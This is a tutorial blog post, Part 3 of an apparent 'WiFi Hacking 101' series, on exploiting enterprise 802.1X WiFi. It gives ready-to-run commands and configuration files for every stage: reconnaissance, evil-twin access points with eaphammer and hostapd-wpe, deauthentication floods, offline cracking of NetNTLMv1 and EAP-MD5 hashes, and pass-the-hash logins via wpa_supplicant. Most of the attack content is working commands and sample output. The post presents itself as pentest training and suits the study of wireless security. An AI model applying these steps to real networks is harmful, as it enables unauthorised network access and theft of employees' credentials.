WiFi Hacking 101: Exploiting Enterprise Networks (Part 3)

Table of contents

👋 Introduction

Hey everyone!

We’re continuing the WiFi series this week, moving into enterprise network exploitation. This is Part 3, based on the WiFi security course I took last month with @OscarAkaElvis (creator of airgeddon).

Parts 1 and 2 covered the fundamentals: hardware setup, monitor mode, WPA/WPA2 cracking, PMKID attacks, WPS exploitation, and WPA3 vulnerabilities. That’s the home network and small business landscape.

Enterprise WiFi is different. 802.1X authentication with RADIUS servers. Individual user credentials instead of shared passwords. EAP methods like PEAP, TTLS, and TLS. Certificate-based mutual authentication.

On paper, it’s significantly more secure than WPA2-PSK. In practice, it’s consistently misconfigured.

The problem is compatibility. Organizations deploy PEAP+MSCHAPv2 (which leaks NetNTLMv1 hashes ready for offline cracking) because it works with Windows without additional configuration. They enable legacy authentication methods like PAP and EAP-MD5 for backwards compatibility with ancient devices. They skip certificate validation on client devices to avoid support tickets.

Every one of these decisions creates an attack vector.

This week we’re covering the fundamentals of enterprise WiFi exploitation: 802.1X architecture, EAP authentication methods, reconnaissance techniques, credential capture attacks with Evil Twin, legacy method exploitation, and Pass-the-Hash.

Part 4 (next week) will cover the advanced techniques: PEAP relay attacks, ESSID stripping for WIDS bypass, and comprehensive defensive mitigations.

Let’s exploit some enterprise WiFi 👇

🏢 Enterprise WiFi Architecture

Enterprise WiFi uses 802.1X (IEEE standard from 2001) for network access control. Instead of a shared password like WPA2-PSK, each user authenticates with individual credentials verified against a backend RADIUS server.

Key components:

Supplicant - The client device (laptop, phone) trying to connect. Runs wpa_supplicant or Windows supplicant.

Authenticator - The access point. Doesn’t make auth decisions, just forwards EAP frames between supplicant and RADIUS server.

Authentication Server - RADIUS server integrated with Active Directory or LDAP. Makes the accept/reject decision.

Authentication flow:

1. Client sends EAPOL-Start to AP
2. AP forwards EAP-Identity-Request to client
3. Client responds with identity ([email protected])
4. AP forwards to RADIUS server
5. RADIUS server initiates EAP method (PEAP, TTLS, TLS)
6. Client and RADIUS establish TLS tunnel
7. Inner authentication happens inside tunnel (MSCHAPv2, GTC, etc)
8. RADIUS sends Access-Accept or Access-Reject to AP
9. AP grants or denies network access

This architecture has a fundamental flaw: the access point blindly forwards EAP frames. It doesn’t validate that the RADIUS server is legitimate. This enables Evil Twin attacks where an attacker presents a fake AP, and if clients don’t enforce certificate validation, they connect automatically and leak credentials.

🔐 EAP Authentication Methods

EAP (Extensible Authentication Protocol, RFC 3748) supports multiple authentication mechanisms. Each has different security properties and attack surfaces.

PEAP (Protected EAP)

Most common in corporate environments. Establishes a TLS tunnel between client and RADIUS server, then performs inner authentication inside the tunnel.

PEAP+MSCHAPv2 is the standard configuration. Client sends username/password. Server responds with challenge. Client computes response using NT hash of password. This challenge/response is NetNTLMv1, which can be captured and cracked offline.

The TLS tunnel protects credentials from passive eavesdropping but does nothing against active Evil Twin attacks if the client doesn’t validate the server certificate.

EAP-TTLS (Tunneled TLS)

Similar to PEAP but more flexible. Supports more inner authentication methods including PAP (plaintext passwords inside tunnel), CHAP, MSCHAPv2, and EAP-based methods.

EAP-TTLS+PAP is dangerously common. Organizations deploy it for legacy device compatibility. If you can get a client to connect to your fake AP, you capture plaintext credentials.

EAP-TLS

The most secure option. Mutual certificate-based authentication. Both client and server present certificates. No passwords transmitted.

If an enterprise network uses EAP-TLS exclusively with proper certificate validation, you’re not capturing credentials through Evil Twin attacks. You’ll need to pivot to other vectors (physical access to extract client certs, social engineering, etc).

Legacy Methods

PAP (Password Authentication Protocol) - Transmits passwords in cleartext. Only acceptable inside a TLS tunnel (TTLS+PAP). If deployed without tunneling, credentials are immediately compromised.

CHAP (Challenge-Handshake Authentication Protocol) - Uses MD5 challenge/response. Weak cryptography, vulnerable to offline cracking.

EAP-MD5 - Legacy EAP method with simple MD5 challenge/response. No mutual authentication. No session key derivation. Completely broken. Credentials can be captured and cracked offline.

If you discover PAP, CHAP, or EAP-MD5 enabled on an enterprise network, that’s a critical finding.

🔍 Reconnaissance Phase

Before attacking, understand the target network’s configuration.

Capture EAP Identities

User identities are transmitted during EAP authentication. These follow specific formats:

• User Principal Name: [email protected]
• Domain\User: DOMAIN\username
• SAMAccountName: username
• Email: [email protected]
• Anonymous: [email protected]

# Start capture on target network
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

Analyze with Wireshark:

eap && eap.identity

You’ll see identity formats and potentially extract valid usernames for further attacks.

Extract AP Certificate

The access point presents a server certificate during TLS tunnel establishment. You need certificate details to create a convincing fake AP.

Wireshark filter:

eap && tls.handshake.certificate

Look for:

• Subject: Server hostname
• Issuer: Certificate Authority
• Validity period
• Subject Alternative Names (SANs)

The more closely your fake certificate resembles the legitimate one, the more likely clients will connect automatically (if they’re not enforcing CA validation, which many aren’t).

Detect Supported EAP Methods

Once you have a valid username, test which EAP methods the RADIUS server supports.

EAP_buster tool:

# Clone
git clone https://github.com/blackarrowsec/EAP_buster
cd EAP_buster

# Test methods (adapter in managed mode)
bash ./EAP_buster.sh 'wlan0' '[email protected]'

This probes the RADIUS server with different EAP method requests. Output shows which methods are accepted (PEAP, TTLS, TLS, MD5, etc).

If you see PAP, CHAP, or EAP-MD5 accepted, prioritize those for credential capture.

💀 Attack 1: Credential Capture with Evil Twin

The most practical enterprise WiFi attack. Set up a fake access point that mimics the legitimate network. When clients connect, capture authentication credentials.

Prerequisites:

• Valid SSID
• Target channel
• Certificate details (from recon phase)
• Tool: hostapd-wpe or eaphammer

Using eaphammer

eaphammer automates the entire attack workflow.

Step 1: Create certificates

# Clone and setup
git clone https://github.com/s0lst1c3/eaphammer
cd eaphammer

# Certificate wizard
python3 ./eaphammer --cert-wizard

Answer prompts with details extracted from legitimate AP certificate. The closer the match, the better.

Step 2: Launch Evil Twin

# Adapter must be in managed mode
# eaphammer will switch it to master mode automatically

python3 ./eaphammer -i wlan0 \
  --auth wpa-eap \
  --essid 'CorporateWiFi' \
  --creds

This creates a fake AP with SSID “CorporateWiFi” and starts capturing credentials.

Step 3: Deauth legitimate clients (on second adapter)

# On second adapter in monitor mode
# Tune to target channel
sudo iw dev wlan1mon set channel 6

# Deauth attack
sudo aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF --ignore-negative-one wlan1mon

Clients disconnect from real AP and reconnect. If their configuration doesn’t enforce proper certificate validation, they connect to your fake AP automatically.

Step 4: Captured credentials

eaphammer outputs captured hashes in real-time:

[CREDS] username: [email protected]
[CREDS] NetNTLMv1 Challenge: 5c2b6f3a7d8e9f1c
[CREDS] NetNTLMv1 Response: a7d8e9f1c2b3a4f5...

These NetNTLMv1 hashes can be cracked offline with Hashcat or John the Ripper.

Using hostapd-wpe

hostapd-wpe is the alternative. More manual but works reliably.

Configuration file (hostapd-wpe.conf):

interface=wlan0
driver=nl80211
ssid=CorporateWiFi
channel=6
hw_mode=g

wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
auth_algs=3

ieee8021x=1
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/etc/hostapd-wpe/certs/ca.pem
server_cert=/etc/hostapd-wpe/certs/server.pem
private_key=/etc/hostapd-wpe/certs/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/certs/dh

EAP user file (hostapd.eap_user):

*     PEAP,TTLS,TLS,FAST
"t"   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC   "t"   [2]

This accepts any username and enables all methods.

Launch:

sudo hostapd-wpe hostapd-wpe.conf

Captured hashes are logged to console and hostapd-wpe.log.

Cracking NetNTLMv1 Hashes

Hashcat (GPU-accelerated):

# Hashcat mode 5500 for NetNTLMv1
hashcat -m 5500 -a 0 hashes.txt wordlist.txt

# With rules for better coverage
hashcat -m 5500 -a 0 hashes.txt wordlist.txt -r rules/best64.rule

John the Ripper:

john --format=netntlm-naive --wordlist=wordlist.txt hashes.txt

NetNTLMv1 is significantly faster to crack than NetNTLMv2. Weak passwords fall within minutes.

🔓 Attack 2: Legacy Method Exploitation

If the network supports PAP, CHAP, or EAP-MD5, exploitation is straightforward.

EAP-MD5 Credential Capture

EAP-MD5 uses simple MD5 challenge/response without tunneling. Capture the exchange and crack offline.

Capture with Wireshark:

eap && eap.type == 4

Extract:

• Identity (username)
• Challenge (MD5 challenge value)
• Response (MD5 response value)

Example from pcap:

Identity: jsmith
Challenge (hex): 5c2b6f3a7d8e9f1c2a3b4c5d6e7f8091
Response (hex): a7d8e9f1c2b3a4f5c6d7e8f90a1b2c3d

Cracking EAP-MD5 with eapmd5pass

# Format challenge and response with colons
CHALLENGE=$(echo "5c2b6f3a7d8e9f1c2a3b4c5d6e7f8091" | sed 's/\(..\)/\1:/g;s/:$//')
RESPONSE=$(echo "a7d8e9f1c2b3a4f5c6d7e8f90a1b2c3d" | sed 's/\(..\)/\1:/g;s/:$//')

# Crack with dictionary
eapmd5pass -w wordlist.txt -E jsmith -C "$CHALLENGE" -R "$RESPONSE"

Alternative: hcxpcapngtool + Hashcat

# Convert capture to Hashcat format
hcxpcapngtool --eapmd5=eapmd5.hash capture.cap

# Crack with Hashcat mode 4800
hashcat -m 4800 -a 0 eapmd5.hash wordlist.txt

TTLS+PAP Plaintext Capture

If the network supports TTLS+PAP and clients don’t validate server certificates, you capture plaintext passwords.

eaphammer captures automatically:

python3 ./eaphammer -i wlan0 --auth wpa-eap --essid 'CorporateWiFi' --creds

When a client connects using TTLS+PAP, eaphammer logs:

[CREDS] username: [email protected]
[CREDS] password: Summer2024!

No cracking needed. Direct cleartext credentials.

🔑 Pass-the-Hash in Enterprise WiFi

Once you’ve captured NetNTLMv1 hashes, you can use them directly without cracking.

wpa_supplicant supports NT hash authentication:

# Generate NT hash from password (for testing)
echo -n "Password123!" | iconv -t UTF16LE | openssl dgst -md4 -provider legacy

Output: 8846f7eaee8fb117ad06bdd830b7586c

Configuration file:

network={
    ssid="CorporateWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="[email protected]"
    password=hash:8846f7eaee8fb117ad06bdd830b7586c  # NT hash
    phase1="peapver=0"
    phase2="auth=MSCHAPV2"
}

Connect:

wpa_supplicant -D nl80211 -i wlan0 -c corp.conf

You’re authenticated using the hash. No need to crack the plaintext password.

This is particularly useful when you’ve captured hashes but cracking is taking too long. Authenticate immediately with the hash.

🎯 Key Takeaways

Enterprise WiFi security depends entirely on proper configuration. 802.1X with RADIUS provides strong authentication architecture, but organizations consistently misconfigure it.

The most common failure is not enforcing certificate validation on clients. This single misconfiguration enables all Evil Twin attacks. Clients connect to fake access points automatically, leaking credentials.

PEAP+MSCHAPv2 is the most deployed enterprise method and remains vulnerable to credential capture. NetNTLMv1 hashes can be cracked offline or used directly via Pass-the-Hash.

Legacy methods (PAP, CHAP, EAP-MD5) should never be deployed. If you find them during an assessment, that’s a critical finding. Credentials are either plaintext or trivially crackable.

Reconnaissance is essential. Extract EAP identities to understand username formats. Capture AP certificates to create convincing fake APs. Test supported EAP methods with EAP_buster to identify the weakest path.

eaphammer and hostapd-wpe are your primary tools. Both capture credentials automatically. eaphammer is more automated, hostapd-wpe gives you more control.

Pass-the-Hash works in enterprise WiFi. You don’t always need to crack captured hashes. Use them directly in wpa_supplicant configuration.

---

That’s it for Part 3!

We’ve covered the fundamentals of enterprise WiFi exploitation: architecture, authentication methods, reconnaissance, credential capture, legacy method attacks, and Pass-the-Hash.

Part 4 (next week) will dive into advanced techniques: PEAP relay attacks (real-time credential relaying without cracking), ESSID stripping for WIDS bypass, comprehensive defensive mitigations, and practice lab setup.

These attacks work because organizations prioritize compatibility and ease of deployment over security. Test them on your own lab first. Set up a Raspberry Pi with FreeRADIUS and hostapd. Practice the techniques until you understand the 802.1X flow completely.

Thanks for reading, and happy hunting!

— Ruben

Other Issues

WiFi Hacking 101: WPA/WPA2 Cracking, PMKID, and WPS (Part 2)

Previous Issue

WiFi Hacking 101: Wrapping Up the Series (Part 4)

Next Issue